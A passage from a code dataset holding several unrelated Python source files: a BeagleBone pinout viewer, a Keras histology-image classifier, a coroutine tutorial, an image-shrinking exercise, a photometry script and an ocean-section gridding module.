0\nTWO_COLUMNS_FORMAT = 1\n\ndef load_pinout_config(config_file):\n '''\n Parse the specified file to load the different modes of each pin of zones P8 and P9\n '''\n df = open(config_file, \"r\")\n\n p8_pins = [] # List of tuples ([modes], [buses])\n p9_pins = [] # List of tuples ([modes], [buses])\n\n # Config file lines\n for index, line in enumerate(df.readlines()):\n if (index < PINOUT_ZONE_SIZE):\n p8_entry_modes = []\n for mode in line.split(\"|\")[1].split(\"@\")[0].split(\" \"):\n p8_entry_modes.append(mode)\n p8_entry_buses = []\n try:\n for bus in line.split(\"|\")[1].split(\"@\")[1].split(\" \"):\n p8_entry_buses.append(bus)\n except:\n p8_entry_modes[-1] = p8_entry_modes[-1][:-1] # Remove last item's \\n (There are not buses, so the '\\n' character is on the last mode)\n else:\n p8_entry_buses[-1] = p8_entry_buses[-1][:-1] # Remove last item's \\n (The '\\n' is on the last bus)\n p8_pins.append((p8_entry_modes[1:], p8_entry_buses)) # Remove first space\n\n else:\n p9_entry_modes = []\n for mode in line.split(\"|\")[1].split(\"@\")[0].split(\" \"):\n p9_entry_modes.append(mode)\n p9_entry_buses = []\n try:\n for bus in line.split(\"|\")[1].split(\"@\")[1].split(\" \"):\n p9_entry_buses.append(bus)\n except:\n p9_entry_modes[-1] = p9_entry_modes[-1][:-1] # Remove last item's \\n (There are not buses, so the '\\n' character is on the last mode)\n else:\n p9_entry_buses[-1] = p9_entry_buses[-1][:-1] # Remove last item's \\n (The '\\n' is on the last bus)\n p9_pins.append((p9_entry_modes[1:], p9_entry_buses)) # Remove first space\n\n return p8_pins, p9_pins\n\ndef get_gpio_states():\n '''\n Returns a list of tuples with the GPIOs states\n '''\n gpio_states = []\n\ndef get_color(mode):\n '''\n Returns the color of the mode passed as parameter.\n '''\n if \"GPIO\" in mode:\n return colors.GREEN\n elif \"AIN\" in mode:\n return colors.CYAN\n elif \"PWM\" in mode:\n return colors.YELLOW\n elif \"UART\" in mode:\n return colors.PURPLE\n elif \"SPI\" in mode:\n return colors.RED\n elif \"I2C\" in mode:\n return colors.BLUE\n elif \"3V3\" in mode or \"5V\" in mode or \"VDD\" in mode:\n return colors.BROWN\n elif \"GND\" in mode:\n return colors.ORANGE\n else:\n return colors.WHITE\n\ndef list_has_element(list, elem):\n '''\n Returns True if the list passed as parameter has the element passed as parameter.\n '''\n for list_i in list:\n if list_i in elem:\n return True\n return False\n\nclass PinsManager():\n \n def __init__(self):\n \n # Load pins configuration file\n #self.file = open(\"/opt/source/dtb-4.14-ti/src/arm/am5729-beagleboneai-roboticscape.dts\", \"r\")\n\n self.p8_pins, self.p9_pins = load_pinout_config(\"files/pins_modes\")\n\n # Update pins status\n self.refresh_gpio_list()\n\n # Pins which are not availables\n self.enabled_buses = []\n self.enabled_buses += self.gpio_list_enabled\n #self.enabled_buses.append(self.ain_list_enabled)\n #self.enabled_buses.append(self.pwm_list_enabled)\n #self.enabled_buses.append(self.i2c_list_enabled)\n #self.enabled_buses.append(self.spi_list_enabled)\n #self.enabled_buses.append(self.uart_list_enabled)\n\n\n def refresh_gpio_list(self):\n\n # List directories from the /sys/class/gpio folder\n self.gpio_list_enabled = os.listdir(\"/sys/class/gpio\")\n # Filter the list to only the GPIOs\n self.gpio_list_enabled = [gpio[4:] for gpio in self.gpio_list_enabled if gpio.startswith(\"gpio\") and \"chip\" not in gpio]\n\n def show_pinout(self, format=TWO_COLUMNS_FORMAT, filtered_pins=None, show_enabled=False, get_color_function=get_color):\n\n if format == ONE_COLUMN_FORMAT:\n\n # Useful to calculate the number of spaces to insert to each row in order to ajustate the showed info\n p9_left_spaces = 0\n for i in range(PINOUT_ZONE_SIZE):\n if filtered_pins:\n p9_i_list = [pin for pin in self.p9_pins[i][0] if list_has_element(filtered_pins, pin.lower())]\n else:\n p9_i_list = self.p9_pins[i][0]\n aux_len = len(\" \".join(p9_i_list))\n if aux_len > p9_left_spaces:\n p9_left_spaces = aux_len\n \n print(\"\\n\")\n for i in range(PINOUT_ZONE_SIZE):\n # Filter to pins in filtered_pins\n if filtered_pins is not None:\n p9_i_list = [pin for pin in self.p9_pins[i][0] if list_has_element(filtered_pins, pin.lower())]\n p8_i_list = [pin for pin in self.p8_pins[i][0] if list_has_element(filtered_pins, pin.lower())]\n else:\n p9_i_list = self.p9_pins[i][0]\n p8_i_list = self.p8_pins[i][0]\n\n # Get asociated status for each pin\n p9_entry_status = None\n p8_entry_status = None\n\n if show_enabled and len(self.enabled_buses) > 0:\n p9_entry_status = [(pin not in self.enabled_buses) for pin in self.p9_pins[i][1]]\n p8_entry_status = [(pin not in self.enabled_buses) for pin in self.p8_pins[i][1]]\n\n aux_len = len(\" \".join(p9_i_list))\n left_painted_list = colors.get_painted_list(get_color_function, p9_i_list, selected_pins_map=p9_entry_status)\n right_painted_list = colors.get_painted_list(get_color_function, p8_i_list, selected_pins_map=p8_entry_status)\n \n print(\" \" * (p9_left_spaces - aux_len) + \" \" * MARGIN_SHOW + \" \".join(left_painted_list) + \" |\" + \" \" * (3 - len(str(i + 1)) + 1) + f\"{colors.PURPLE}P9_{i+1} --- P8_{i+1}{colors.WHITE}\"\n + \" \" * (3 - len(str(i + 1)) + 1) + \"| \" + \" \".join(right_painted_list))\n\n else: # TWO_COLUMN_FORMAT \n\n # Useful to calculate the number of spaces to insert to each row in order to ajustate the showed info\n p9_left_spaces = 0\n p9_right_spaces = 0\n p8_left_spaces = 0\n for i in range(0, PINOUT_ZONE_SIZE, 2):\n # Filter to pins in filtered_pins\n if filtered_pins is not None:\n p9_left_i_list = [pin for pin in self.p9_pins[i][0] if list_has_element(filtered_pins, pin.lower())]\n p9_right_i_list = [pin for pin in self.p9_pins[i+1][0] if list_has_element(filtered_pins, pin.lower())]\n p8_left_i_list = [pin for pin in self.p8_pins[i][0] if list_has_element(filtered_pins, pin.lower())]\n else:\n p9_left_i_list = self.p9_pins[i][0]\n p9_right_i_list = self.p9_pins[i+1][0]\n p8_left_i_list = self.p8_pins[i][0]\n\n aux_len = len(\" \".join(p9_left_i_list))\n if aux_len > p9_left_spaces:\n p9_left_spaces = aux_len\n\n aux_len = len(\" \".join(p9_right_i_list))\n if aux_len > p9_right_spaces:\n p9_right_spaces = aux_len\n\n aux_len = len(\" \".join(p8_left_i_list))\n if aux_len > p8_left_spaces:\n p8_left_spaces = aux_len\n\n print(\"\\n\")\n for i in range(0, PINOUT_ZONE_SIZE, 2):\n # Filter to pins in filtered_pins\n if filtered_pins is not None:\n p9_left_i_list = [pin for pin in self.p9_pins[i][0] if list_has_element(filtered_pins, pin.lower())]\n p9_right_i_list = [pin for pin in self.p9_pins[i+1][0] if list_has_element(filtered_pins, pin.lower())]\n p8_left_i_list = [pin for pin in self.p8_pins[i][0] if list_has_element(filtered_pins, pin.lower())]\n p8_right_i_list = [pin for pin in self.p8_pins[i+1][0] if list_has_element(filtered_pins, pin.lower())]\n else:\n p9_left_i_list = self.p9_pins[i][0]\n p9_right_i_list = self.p9_pins[i+1][0]\n p8_left_i_list = self.p8_pins[i][0]\n p8_right_i_list = self.p8_pins[i+1][0]\n\n # Get asociated status for each pin\n p9_left_status = None\n p9_right_status = None\n p8_left_status = None\n p8_right_status = None\n\n if show_enabled and len(self.enabled_buses) > 0:\n p9_left_status = [(pin not in self.enabled_buses) for pin in self.p9_pins[i][1]]\n p9_right_status = [(pin not in self.enabled_buses) for pin in self.p9_pins[i+1][1]]\n p8_left_status = [(pin not in self.enabled_buses) for pin in self.p8_pins[i][1]]\n p8_right_status = [(pin not in self.enabled_buses) for pin in self.p8_pins[i+1][1]]\n\n p9_left_painted_list = colors.get_painted_list(get_color_function, p9_left_i_list, selected_pins_map=p9_left_status)\n p9_right_painted_list = colors.get_painted_list(get_color_function, p9_right_i_list, selected_pins_map=p9_right_status)\n p8_left_painted_list = colors.get_painted_list(get_color_function, p8_left_i_list, selected_pins_map=p8_left_status)\n p8_right_painted_list = colors.get_painted_list(get_color_function, p8_right_i_list, selected_pins_map=p8_right_status)\n\n \n print(\" \" * (p9_left_spaces - len(\" \".join(p9_left_i_list))) + \" \" * MARGIN_SHOW + \" \".join(p9_left_painted_list) + \" |\" + \" \" * (3 - len(str(i + 1)) + 1) + f\"{colors.PURPLE}{i+1} -- P9 -- {i+2}{colors.WHITE}\"\n + \" \" * (3 - len(str(i+2 + 1)) + 1) + \"| \" + \" \".join(p9_right_painted_list)\n + \" \" * MARGIN_SHOW + \" \" * (p9_right_spaces - len(\" \".join(p9_right_i_list))) + \".\"\n + \" \" * (p8_left_spaces - len(\" \".join(p8_left_i_list))) + \" \" * MARGIN_SHOW + \" \".join(p8_left_painted_list) + \" |\" + \" \" * (3 - len(str(i + 1)) + 1) + f\"{colors.PURPLE}{i+1} -- P8 -- {i+2}{colors.WHITE}\"\n + \" \" * (3 - len(str(i+2 + 1)) + 1) + \"| \" + \" \".join(p8_right_painted_list))\n\n print(\"\") # New line\n\n def show_GPIO_ports(self):\n '''\n Displays the available GPIOs ports.\n The ones which are showed with green color indicates they are activated.\n The ones which are showed with red color indicates they are deactivated.\n '''\n \n # Update pins status\n self.refresh_gpio_list() # ¿Debería utilizar una función decoradora para que siempre se actualicen?\n\n self.show_pinout(filtered_pins=[\"gpio\"], show_enabled=True)\n\n print(\"\")\n \n\n def show_AIN_ports(self):\n '''\n Display the available Analogic ports.\n The ones which are showed with green color indicates they are activated.\n '''\n\n # Update pins status\n self.refresh_gpio_list()\n\n print(\"\")","repo_name":"Andresitositoses/BeagleboneAI-utils","sub_path":"src/pinsManager.py","file_name":"pinsManager.py","file_ext":"py","file_size_in_byte":11405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"73710140842","text":"#%%\nfrom __future__ import absolute_import, division, print_function, unicode_literals\nimport tensorflow as tf\nimport os, sys\nimport argparse\nimport numpy as np\nimport uuid\nimport pandas as pd\nimport math\nimport datetime\nimport time\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import train_test_split, KFold\nfrom sklearn.preprocessing import OneHotEncoder\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import multilabel_confusion_matrix\nfrom modelingutils import *\n#from bayes_opt import BayesianOptimization\nfrom tensorflow.keras import datasets, layers, models, regularizers, optimizers\nfrom tensorflow.compat.v1.keras import initializers\nfrom tensorflow.keras.applications.inception_v3 import InceptionV3\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\nfrom tensorflow.keras.callbacks import EarlyStopping, TensorBoard, LearningRateScheduler\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import train_test_split, KFold\nfrom sklearn.preprocessing import LabelBinarizer\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.preprocessing import StandardScaler\nimport pathlib\nfrom net_models import *\nfrom net_inception import *\nfrom net_resnet50 import *\nfrom net_biopixel import *\n\ndef load_model(model_name):\n return tf.keras.models.load_model(model_name,\n custom_objects={'LeakyReLU': layers.LeakyReLU}\n ), model_name, 0\n\ndef main(p):\n data_dir = pathlib.Path(p + \"Kather_texture_2016_image_tiles_5000\", 'Kather_texture_2016_image_tiles_5000')\n os.listdir(data_dir)\n\n image_count = len(list(data_dir.glob('*/*.tif')))\n print(image_count)\n\n # Classification labels\n class_names = np.array([item.name for item in data_dir.glob('*') if item.name not in [\".DS_Store\"]]) # \"08_EMPTY\"\n print(class_names)\n\n # Data generators and augmentation\n batch_size = 128\n img_height = 150\n img_width = 150\n input_shape = (img_height, img_width, 3)\n\n # Data augmentation, to increase the generalizability of our classifier, we may first randomly jitter points along the distribution by adding some random values\n # In-place data augmentation or on-the-fly data augmentation https://www.pyimagesearch.com/2019/07/08/keras-imagedatagenerator-and-data-augmentation/\n # Standardization is a data scaling technique that assumes that the distribution of the data is Gaussian and shifts the distribution of the data to have a mean of zero and a standard deviation of one.\n train_datagen = ImageDataGenerator( \n # rescale=1./255,\n rotation_range=45, \n width_shift_range=.15,\n height_shift_range=.15,\n horizontal_flip=True,\n #shear_range=0.2,\n zoom_range=0.5,\n samplewise_center=True, # std & scale\n samplewise_std_normalization=True,\n # validation_split=0.2\n )\n val_datagen = ImageDataGenerator( \n #rescale=1./255, # normalize\n samplewise_center=True, # std & scale\n samplewise_std_normalization=True,\n #validation_split=0.1\n )\n test_datagen = ImageDataGenerator(\n #rescale=1./255, # normalize\n samplewise_center=True, # std & scale\n samplewise_std_normalization=True\n )\n\n # Make df of all images and split on train / test set\n traindf, valdf, testdf = read_split_imagefiles(data_dir, class_names)\n duplicate_checkdf = pd.concat([traindf, valdf, testdf],ignore_index=True).drop_duplicates().reset_index(drop=True)\n if traindf.shape[0] + valdf.shape[0] + testdf.shape[0] != duplicate_checkdf.shape[0]:\n print(\"Duplicates detected! {} {} {} {}\".format(traindf.shape[0], valdf.shape[0], testdf.shape[0], duplicate_checkdf.shape[0]))\n\n train_generator = train_datagen.flow_from_dataframe( \n dataframe=traindf,\n directory=data_dir,\n shuffle=True,\n target_size=(img_height, img_width),\n batch_size=batch_size,\n #subset='training', \n class_mode='categorical',\n classes = list(class_names))\n\n validation_generator = val_datagen.flow_from_dataframe(\n dataframe=valdf,\n directory=data_dir,\n shuffle=True,\n target_size=(img_height, img_width),\n batch_size=batch_size,\n #subset='validation', \n class_mode='categorical',\n classes = list(class_names))\n\n test_generator = test_datagen.flow_from_dataframe(\n dataframe=testdf,\n directory=data_dir,\n shuffle=False,\n target_size=(img_height, img_width),\n batch_size=batch_size,\n class_mode='categorical',\n classes = list(class_names))\n\n # Featurewise statistics\n #image_batch, label_batch = next(train_generator)\n #datagen.fit(image_batch)\n #test_datagen.fit(image_batch)\n\n # Inspect a batch\n #image_batch, label_batch = next(train_generator)\n #show_batch(image_batch, label_batch, class_names)\n\n #image_batch, label_batch = next(test_generator)\n #show_batch(image_batch, label_batch, class_names)\n\n print(\"Training samples: \", train_generator.samples)\n print(\"Validation samples: \", validation_generator.samples)\n print(\"Test samples: \", test_generator.samples)\n\n # Train\n #model, model_name, epochs = programtest_model(input_shape, class_names)\n #model, model_name, epochs = inception_model(input_shape, class_names)\n model, model_name, epochs = convolutional_model(input_shape, class_names)\n #model, model_name, epochs = resnet50_model(input_shape, class_names)\n #model, model_name, epochs = biopixel_model(input_shape, class_names)\n #model, model_name, epochs = load_model(\"conv_model-100.h5\")\n model.summary()\n\n #return model, test_generator, class_names\n\n # Setup callbacks\n #es = EarlyStopping(monitor=\"val_loss\", mode=\"min\", verbose=1, patience=100)\n tb = TensorBoard(log_dir='./logs', write_graph=True, write_images=True, update_freq='epoch')\n callbacks=[tb] #,es]\n\n print(\"Train for epochs: \", epochs)\n\n H = model.fit(\n train_generator,\n steps_per_epoch = train_generator.samples // batch_size,\n epochs=epochs,\n validation_data=validation_generator,\n validation_steps = validation_generator.samples // batch_size,\n callbacks=callbacks\n )\n \n model.summary()\n plot_history(H)\n model.save(\"{}-{}.h5\".format(model_name, epochs))\n #model.save(\"./colorectal-histology-mnist/models/{}.h5\".format(model_name))\n\n ## Test model\n test_model(model, test_generator, class_names)\n\n #https://towardsdatascience.com/understanding-your-convolution-network-with-visualizations-a4883441533b\n #https://github.com/anktplwl91/visualizing_convnets/blob/master/model_training_and_visualizations.py\n\n return model, test_generator, class_names\n\n# Run as:\n# floyd run\nif __name__ == \"__main__\":\n # Import images\n p = '/mnist/' #floydhub\n #p = '../../colorectal-histology-mnist/' #local\n #p = './colorectal-histology-mnist/data/' #cloud\n model, test_generator, class_names = main(p)\n\n #Tasks: inspect a batch, train a model, test a model, apply a model (class activation)\n\n\n\n\n# %%\n","repo_name":"martinlie/iti43210_project2","sub_path":"modeling/convolutional_nets.py","file_name":"convolutional_nets.py","file_ext":"py","file_size_in_byte":7162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"11496898885","text":"# Корутины генератопы которые из вне получают данные\n# from inspect import getgeneratorstate, библиотека, чтобы посмотреть в каком состояние генератор.\n# throw(StopIteration)\n# average() - создаст объект генератора\n# coroutine - декоратор для инициализации генератора\n# генераторы и корутины могут иметь return и возвращать некое значение.\n\n\ndef coroutine(func):\n def inner(*args, **kwargs):\n g = func(*args, **kwargs)\n g.send(None)\n return g\n return inner\n\n\ndef subgen():\n x = 'Ready to acept message'\n message = yield x\n print('Subgen received', message)\n\n\nclass BlaBlaException(Exception):\n pass\n\n\n@coroutine\ndef average():\n count = 0\n summ = 0\n average = None\n\n while True:\n try:\n x = yield average\n except StopIteration:\n print('Done')\n break\n except BlaBlaException:\n print('------------------------------')\n break\n else:\n count += 1\n summ += x\n average = round(summ/count)\n return average","repo_name":"kmv1712/lesson_on_asynchrony_from_oleg_molchanov","sub_path":"5_coroutines.py","file_name":"5_coroutines.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"41414947148","text":"\"\"\"\r\nFile: shrink.py\r\nName: Jasmin Hsu\r\n-------------------------------\r\nCreate a new \"out\" image half the width and height of the original.\r\nSet pixels at x=0 1 2 3 in out , from x=0 2 4 6 in original,\r\nand likewise in the y direction.\r\n\"\"\"\r\n\r\nfrom simpleimage import SimpleImage\r\n\r\n\r\ndef shrink(filename):\r\n \"\"\"\r\n :param filename: str, the file path of the original image\r\n :return img: SimpleImage, the image with 1/2 original width and height\r\n \"\"\"\r\n img = SimpleImage(filename)\r\n b_img = SimpleImage.blank(img.width//2, img.height//2)\r\n for x in range(img.width):\r\n for y in range(img.height):\r\n if x % 2 == 0 and y % 2 == 0 or x == y == 0: # Only use even pixels\r\n pixel_img = img.get_pixel(x, y)\r\n pixel_b_img = b_img.get_pixel(x/2, y/2)\r\n pixel_b_img.red = pixel_img.red\r\n pixel_b_img.blue = pixel_img.blue\r\n pixel_b_img.green = pixel_img.green\r\n\r\n return b_img\r\n\r\n\r\ndef main():\r\n \"\"\"\r\n This program will shrink the original image proportionally\r\n \"\"\"\r\n original = SimpleImage(\"images/poppy.png\")\r\n original.show()\r\n after_shrink = shrink(\"images/poppy.png\")\r\n after_shrink.show()\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"JasminHsu/StanCode-Projects","sub_path":"stanCode-projects/photoshop/shrink.py","file_name":"shrink.py","file_ext":"py","file_size_in_byte":1273,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"6836861244","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Feb 23 11:55:09 2021\r\n\r\n@author: 55119\r\n\"\"\"\r\n\r\nimport os\r\nimport shutil\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom astropy.table import QTable\r\nfrom astropy.table import Table\r\nimport matplotlib.pyplot as plt\r\nfrom astropy.io import fits\r\nimport astropy.units as u\r\nfrom photutils import CircularAperture\r\nfrom photutils import aperture_photometry\r\nfrom photutils.datasets import make_100gaussians_image\r\nfrom photutils import CircularAperture, CircularAnnulus\r\nimport context\r\n\r\ndata_dir = os.path.join(context.data_dir, \"FCC_halpha\")\r\ngalaxies = sorted(os.listdir(data_dir))\r\nfor galaxy in galaxies:\r\n print(galaxy)\r\n wdir = os.path.join(data_dir, galaxy)\r\n os.chdir(wdir)\r\n try:\r\n cubename = [x for x in os.listdir(wdir) if x.endswith(\"pix.fits\")][0]\r\n except IndexError:\r\n shutil.rmtree(wdir)\r\n continue\r\n # Loading data\r\n data = fits.getdata(cubename, ext=1)\r\n t = Table.read(cubename)\r\n t['FILTER'].tolist()\r\n idx = t['FILTER'].tolist().index('R')\r\n rband = data[idx, :, : ]\r\n #Creating Aperture Objects\r\n positions = np.array([0.5 * rband.shape[0], 0.5 * rband.shape[1]])\r\n radii = np.linspace(1, rband.shape[0] / 2., 30)\r\n # apertures = [CircularAperture(positions, r=r) for r in radii]\r\n apertures = []\r\n plt.subplot(1,2,1)\r\n vmin = np.percentile(rband, 10)\r\n vmax = np.percentile(rband, 95)\r\n plt.imshow(rband, vmin=vmin, vmax=vmax)\r\n for r in radii:\r\n aperture = CircularAperture(positions, r=r)\r\n apertures.append(aperture)\r\n aperture.plot(color='r', lw=1)\r\n plt.subplot(1,2,2)\r\n # Colocar código para máscara aqui\r\n ###\r\n ###\r\n mask = np.zeros_like(rband)\r\n # Performing Aperture Photometry\r\n phot_table = aperture_photometry(rband, apertures, mask=mask)\r\n # Lendo os valores da table\r\n phot = [float(phot_table[\"aperture_sum_{}\".format(i)]) for i in range(30)]\r\n table = Table([radii, phot], names=[\"r\", \"photsum\"])\r\n table.write(\"photometry_R.fits\", overwrite=True)\r\n plt.plot(radii, phot, \"o\")\r\n plt.savefig('CUBE_FOTOMETRIA_R.png')\r\n plt.show()\r\n \r\n # #Multiple Apertures at Each Position\r\n # radii = [3., 4., 5.]\r\n # apertures = [CircularAperture(positions, r=r) for r in radii]\r\n # phot_table = aperture_photometry(data, apertures)\r\n # for col in phot_table.colnames:\r\n # phot_table[col].info.format = '%.8g'\r\n\r\n #Sigma-clipped median within a circular annulus\r\n # data = make_100gaussians_image()\r\n # positions = [(145.1, 168.3), (84.5, 224.1), (48.3, 200.3)]\r\n # aperture = CircularAperture(positions, r=5)\r\n # annulus_aperture = CircularAnnulus(positions, r_in=10, r_out=15)\r\n # annulus_masks = annulus_aperture.to_mask(method='center')\r\n \r\n # plt.imshow(annulus_masks[0], interpolation='nearest')\r\n # plt.colorbar()","repo_name":"cebarbosa/splus-halpha","sub_path":"test_fotometria.py","file_name":"test_fotometria.py","file_ext":"py","file_size_in_byte":2903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"74539798443","text":"\"\"\" Module for the manipulation of section endpoints and gridded section \"\"\"\n\nimport numpy as np\nimport pylab as plt\ntry:\n from param import ee\nexcept ImportError:\n from pypago.sample_param import ee\nimport pypago.toolsec as toolsec\nfrom pypago.disp import PypagoErrors\nimport pypago.misc\n\n\nclass Section(object):\n\n \"\"\" Section endpoint object. \"\"\"\n\n def __init__(self, name, lon, lat, dire):\n\n \"\"\"\n\n :param str name: Name of the section\n :param numpy.array lon: Section endpoints longitudes\n :param numpy.array lat: Section endpoints latitudes\n :param numpy.array dire: Section segments directions\n\n \"\"\"\n self.name = name\n self.lat = np.array(lat)\n self.lon = np.array(lon)\n self.dire = np.array(dire)\n\n def __str__(self):\n\n \"\"\" Redefinition of the string function \"\"\"\n\n output = 'Section %s\\n' % self.name\n output += ' -lon: %s\\n' % self.lon\n output += ' -lat: %s\\n' % self.lat\n output += ' -dire: %s\\n' % self.dire\n return output\n\n\n# @property\n# def name(self):\n# \"\"\" Section name \"\"\"\n# return self.__name\n#\n# @property\n# def lon(self):\n# \"\"\" Section endpoints longitude \"\"\"\n# return self.__lon\n#\n# @property\n# def lat(self):\n# \"\"\" Section endpoints latitude \"\"\"\n# return self.__lat\n#\n# @property\n# def dire(self):\n# \"\"\" Section segments direction \"\"\"\n# return self.__dire\n#\n# @name.setter\n# def name(self, name):\n# '''\n# name setter\n# :param str name: Section name\n# '''\n# self.__name = np.array(name)\n#\n# @lon.setter\n# def lon(self, lon):\n# '''\n# lon setter\n# :param str lon: Section lon\n# '''\n# self.__lon = np.array(lon)\n#\n# @lat.setter\n# def lat(self, lat):\n# '''\n# lat setter\n# :param str lat: Section lat\n# '''\n# self.__lat = np.array(lat)\n#\n# @dire.setter\n# def dire(self, dire):\n# '''\n# dire setter\n# :param str dire: Section dire\n# '''\n# self.__dire = np.array(dire)\n\n\nclass GridSection(object):\n\n \"\"\" Gridded section object \"\"\"\n\n def __init__(self, grid, section):\n\n \"\"\"\n\n :param pypago.grid.Grid grid: Model grid\n :param list section: List of :py:class:`pypago.sections.Section` objects\n\n \"\"\"\n\n self.name = None\n self.modelname = None\n self.i = None\n self.j = None\n self.dire = None\n self.faces = None\n self.orient = None\n self.lengthvect = None\n self.areavect = None\n self.depthvect = None\n self.lvect = None\n self.veci = None\n self.vecj = None\n\n if grid is None:\n self.jmin = None\n self.jmax = None\n self.imin = None\n self.imax = None\n self.nlon = None\n\n elif (grid is not None) and (section is not None):\n self.jmin = grid.jmin\n self.jmax = grid.jmax\n self.imin = grid.imin\n self.imax = grid.imax\n self.nlon = grid.nlon\n self.modelname = grid.modelname\n\n self._initsection(grid, section)\n if self.name is not None:\n # It the initsection worked (name is not None) then we\n # finalise the section\n self._finalisesection(grid)\n else:\n message = 'The grid and section arguments must BOTH be'\n message += 'None or not None. This is not '\n message += 'the case.'\n raise PypagoErrors(message)\n\n def __str__(self):\n\n \"\"\" Redefinition of the str function \"\"\"\n\n output = 'Gridded section, %s model:\\n' % self.modelname\n\n attrnames = pypago.misc.extract_attrlist(self)\n output += pypago.misc.extract_str(attrnames, self)\n\n return output\n\n def _initsection(self, grid, section):\n\n \"\"\"\n Function which allows to initialise the model sections from the\n sections' endpoints, the model longitude and latitudes.\n The index of the sections which are out of the domain\n (should not be further processed)\n are stored in a list. If the section is in the domain, the i,j\n indexes of its\n endpoints and the directions of the segments are stored in a\n |pypago| object.\n\n :param list sections: list of |pypago| objects\n that contains the sections' endpoints\n :param numpy.array lont: longitude of the model subdomain\n :param numpy.array latt: latitude of the model subdomain\n :return: a list (`index_badsec`) that contains the indexes of\n the bad sections and a list (`goodsec`) that contains\n the |pypago| objects of the good sections, containing the section\n endpoints locations in the model grid\n\n \"\"\"\n\n # We try to use the locingrid function.\n # If failed, we append the index of the section to the bad section index list\n try:\n [vecj, veci] = toolsec.locingrid(section.lon,\n section.lat,\n grid.lont,\n grid.latt)\n dire = section.dire\n\n if veci[-1] < veci[0]:\n veci = veci[::-1]\n vecj = vecj[::-1]\n dire = dire[::-1]\n\n self.i = veci\n self.j = vecj\n self.dire = dire\n self.name = section.name\n\n except IOError:\n pass\n\n def _finalisesection(self, grid):\n\n \"\"\"\n Function that performs the computation of section staircases.\n The `sections` arguments are the good sections which have been\n returned by the :py:func:`pypago.sec.initsections`.\n It creates a list of |pypago| objects, each containing the sections'\n properties (`areavect`, `veci`, `vecj`, `depthvect`, `lvect`, etc)\n\n :param list sections: list of the good sections, obtained by the\n :py:func:`pypago.sec.initsections` function\n\n :param pago_obj grid: Pago\n object that contains all the model attributes (area, depthvect,\n scale factor, etc...)\n\n \"\"\"\n\n [vecj, veci] = toolsec.secingrid(self.i[0], self.j[0],\n self.i[1], self.j[1])\n\n [faces, newveci, newvecj, orientation] = toolsec.facesinsec(veci, vecj,\n self.dire[0])\n\n self.veci = newveci\n self.vecj = newvecj\n self.faces = faces\n self.orient = orientation\n\n nl1 = np.floor(len(newveci)/2.)\n if len(self.i) > 2:\n for l in range(2, len(self.i)):\n [vecj, veci] = toolsec.secingrid(self.i[l-1], self.j[l-1],\n self.i[l], self.j[l])\n\n [faces, newveci, newvecj, orientation] = toolsec.facesinsec(veci, vecj, self.dire[l-1])\n\n [finalfaces, finalveci, finalvecj, finalorient] = toolsec.consec(self.veci, self.vecj, self.faces,\n self.orient, newveci, newvecj,\n faces, orientation)\n\n self.veci = finalveci\n self.vecj = finalvecj\n self.faces = finalfaces\n self.orient = finalorient\n nl2 = np.floor(len(newveci)/2.)\n\n # in case section is closed\n if (self.veci[0] == self.veci[-1]) & (self.vecj[0] == self.vecj[-1]):\n\n [finalfaces, finalveci, finalvecj, finalorient] = \\\n toolsec.consec(self.veci[-nl2-1:], self.vecj[-nl2-1:],\n self.faces[-nl2-1:], self.orient[-nl2:-1],\n self.veci[:nl1], self.vecj[:nl1],\n self.faces[:nl1], self.orient[:nl1])\n\n self.veci = np.append(self.veci[nl1:-nl2-1], finalveci)\n self.vecj = np.append(self.vecj[nl1:-nl2-1], finalvecj)\n self.faces = np.append(self.faces[nl1:-nl2-1], finalfaces)\n self.orient = np.append(self.orient[nl1:-nl2-1], finalorient)\n\n self.lengthvect = toolsec.lengthinsec(self.veci, self.vecj, self.faces,\n grid.dyw, grid.dxn)\n\n # if 'e3t_ps' in grid.__dict__.keys():\n # self.depthvect = _depthinsec_e3tps(self.veci, self.vecj,\n # self.faces, grid)\n # self.areavect = self.depthvect*np.tile(np.transpose(self.lengthvect[:, np.newaxis]), (grid.areaW.shape[0], 1))\n # else:\n self.areavect = toolsec.areainsec(self.veci, self.vecj, self.faces,\n grid.areaw, grid.arean)\n self.depthvect = toolsec.areainsec(self.veci, self.vecj, self.faces,\n grid.dzw, grid.dzn)\n\n nl = len(np.nonzero(self.veci == self.veci)[0])\n [vecj, veci] = toolsec.nodouble(self.veci[:nl], self.vecj[:nl])\n self.lvect = np.atleast_1d([0])\n for l in range(1, len(veci)):\n self.lvect = np.append(self.lvect, self.lvect[l-1] +\n toolsec.distance(grid.latt[vecj[l], veci[l]], grid.lont[vecj[l], veci[l]],\n grid.latt[vecj[l-1], veci[l-1]], grid.lont[vecj[l-1], veci[l-1]], ee))\n\n def plotsecfaces(self, axes=None, **kwargs):\n\n \"\"\"\n\n Draws a gridded section as 'staircase',\n with grid points as the x and y coordinates.\n\n Should be plotted on a map background that shows\n the `mask` variables. Must be used to check whether\n the all the dots associated with one section are on the same side\n of the line\n\n :param matplotlib.axes.Axes axes: The\n :py:class:`matplotlib axes ` instance\n where to draw the lines\n\n :param dict kwargs: Additional arguments to the plot function\n :return: The color of the line\n :rtype: list|str|unicode\n\n \"\"\"\n\n if axes is None:\n axes = plt.gca()\n\n lw = 1\n cpt = 1\n\n for indl in range(0, len(self.veci)):\n\n if self.faces[indl] == 'N':\n if cpt:\n lll = axes.plot([self.veci[indl]-.5, self.veci[indl]+.5],\n [self.vecj[indl]+.5, self.vecj[indl]+.5], **kwargs)\n col = lll[0].get_color()\n cpt = 0\n else:\n lll = 